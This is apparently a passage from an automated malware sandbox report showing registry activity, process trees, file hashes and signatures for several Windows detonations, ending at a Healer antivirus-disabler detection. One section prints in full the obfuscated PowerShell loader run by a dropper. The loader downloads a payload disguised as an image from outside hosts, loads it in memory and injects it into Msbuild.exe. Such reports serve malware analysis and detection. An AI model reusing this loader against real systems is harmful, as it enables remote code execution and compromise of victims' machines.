| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b01d891fa688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1268 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab8BDE.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Cab8D28.tmp
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar8D5B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 74d6f818a8ee868b805c3150db7b202e |
| SHA1 | c5680e4c1f0d15fc35a85f431f875348e00b9c42 |
| SHA256 | 43bec25a2409e9e72d90210652e30f8bc5af87392e761f99e29612733eb83070 |
| SHA512 | 468ec373b565ce5612ea6e4aecdba302966f0989a728177d2b8f05ef9e95b4bd645abe368524a9eead7fb618ed202440c9bdd272403e5a18776d7ed3ed9f2642 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 618a7bc75348bd0822db78498308f443 |
| SHA1 | a5364c63caba42c96a35fbd07f6b1fd132b74954 |
| SHA256 | f2091af2c7fad71c5f318dd442634884ec7f04d23404018d61952960ad73fa67 |
| SHA512 | a13bff76daf6c7da90080587a2ce57ac373ec1515a8d79477b9e9dbc286bc038b114a123b83c42bed5529251099b3084267bdf59f324be5c3ec72c1de8136658 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 41e25769df61590d65ab348d00070a76 |
| SHA1 | 859a2ce2b0a1694558b2248fc169835a79167eec |
| SHA256 | 547f0746c5c6f42ad0d86b25130408382bd5d1a18bd3378453df7c2b06f559dd |
| SHA512 | f3081050569a2b7270044386abd264a72d768717368eaaa17f51438070b95226f261a81bbeae72bfac8483018f37d50bede3eabbff4d40948ca01ef95bd7b4ef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1d3d542813d5cc253767e10a54c94caf |
| SHA1 | e8283157e5e63e37024d757efc44b214b9cd1ebf |
| SHA256 | 701225ede54aee2f53f8ca8ead03bddc027731eded8f822d23d4c8ddf7a8b1ce |
| SHA512 | 62208c1a56a0c53cfad45254809dc7dd462e4559e8596faf1e720391230ad6ad9ae9b237df102186206ec32d266592d05bc86dedc58249009063df502bb64626 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7f67868e5f213626b0a2b4d1f291c7c4 |
| SHA1 | 44d95bd4a417a4d3bb4a51214f186c79ce699497 |
| SHA256 | f135d08cfd6c09340cd191e831b56469bc3635d944163114c74e0320889d2ea5 |
| SHA512 | 2274d05f0be146718515d110e746c562d8ba830b6d63464593d2decfc051d73c04f925d115a6db24c566720b5cf85e4c1bcda3048347ed13f54883e83c7e489e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 61ad19a336b8d7517d76611d12341253 |
| SHA1 | 1c5e457d780e0851d6227cfc0f87d8754db15468 |
| SHA256 | 3efe3c8db583c08adfb303934be9a506ea73b5bf516036c4b86b3d28bb944991 |
| SHA512 | 627836bf8e61ae73b26657befc096b86be9a977a4407a47b06fca49e9578010a88550bba70aaca49e47c98dff4638a107bceda5bce5fdfd43a5d29d0d421b9c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 252c7f06b51f7445e02ea235c5aa6320 |
| SHA1 | 23b1706aed751de6a28a74a80a1a07f5f34a7476 |
| SHA256 | c97ee628b47bf8aba12cdee4757cb2488a4401b9967b08136a018f9c829ba1af |
| SHA512 | a7dab346c88004c47bc9c447896ec018c5aa7c45caac2e602877ab12053234019cea00b188356618693eed94f8119e8aa40263ee9373dc669062426637b54c1b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c3066d4ee42ae6818586ac8e5fa73cb |
| SHA1 | 8c8d4019201a03e5f229c3d393925dc3b0d75982 |
| SHA256 | 479ddbff1fc776e144cdc27324efd25ff145e0fe3bf810aa16bd9ff0d5da106b |
| SHA512 | 4a2faa3fd6598633885d5ceb399da96613bd24b67137097abb32f08e316992ffb0d66057000875129dce691561e44d40a48879d92198e3b3a0acae526c71fdc6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a6b2dc49dda314745a1eb7386f1db948 |
| SHA1 | 929510267096fbfffd9de695ddf7a8f306e18459 |
| SHA256 | 11a402830ce22d5262014eb7d3b63bef4401a16a18d52c6f7b9b46cfaef3f025 |
| SHA512 | 13eb1f477e64c0bfc00f09f403132373e42d8d68141dddf71f0ebd5bef4acc860b250a4c84c42e0e699549a8b2fd37790d9a5a991bad792ca4d06e229132b85d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0f0d56d17be620a29ae3d7a744c66db0 |
| SHA1 | 98fe169ee27bf727b99f7460736f694cdeaec8ee |
| SHA256 | 3d0e83d8bb92245a2b8af9b8376a19fcf337aca14b6a0e8b3fec4093bbb8e10e |
| SHA512 | 11b352cf8ef2b6ddae4756c75c08a835e1970291856ae81670f530b361a88f281fa9e9c6a21cc208b0db7a3c8ab4461097fd7dbb336dcfc8a0e43ac95a024f9b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a51a7724ec10acce569195f13c2a6375 |
| SHA1 | f68fe782f27ca62727cc3b92ff738f67305173d7 |
| SHA256 | 3d3842eb7cffe5b4ab15cd93d8ca7e2578a3e4e3473bbdac7f728bdc642b0dad |
| SHA512 | aca36893d06b770f6447f65437a8e413a78194c893d9ee584d61a80594ab775ce8e202eb46029d96f302b7c6f9954c3fed5ab984912066fd5ca1ce6177575a79 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3014a4db4441054a9f855084bc34749a |
| SHA1 | 8d4cb94f20efef927f464407e6946de934748aef |
| SHA256 | 2f9debc95fb56eb879ab98ddbc457bfc9c2dc79b533bf08dceb71c71e6ad5cfd |
| SHA512 | ee898bc30a7f02af6a898d488974f6bf8da65639135ff7028fb86346abfd3fc0dc5ad712daedc4e9c2287a3f62b523b0ab0177db93e83beb4c80e01b1d136f7f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 57fea08146178e608a209293ff1be0b4 |
| SHA1 | f0cbb7ec3528952f8c7f9bb9c8d3394d61f3b0ee |
| SHA256 | bd73c4ff12884a0f4270a3b91b4b4dc310d9336e9ceb1ca71bb9c0a8372e86c0 |
| SHA512 | 8cf055fcf6d984dc758fe6420b577b02cb540bd455e89e50f0bac24000ccceea177f1599e5acf88e85e40617c30305f7d737a206d065d4a3970822d17f792fca |
Analysis: behavioral17
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
131s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff368746f8,0x7fff36874708,0x7fff36874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 /prefetch:2
Network
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
\??\pipe\LOCAL\crashpad_4048_NYEMDOTVAYUBLUHT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Analysis: behavioral24
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1484 set thread context of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\SYSTEM32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 67bcef97a5ffe.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tj1rh1cl.yv4.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Analysis: behavioral26
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
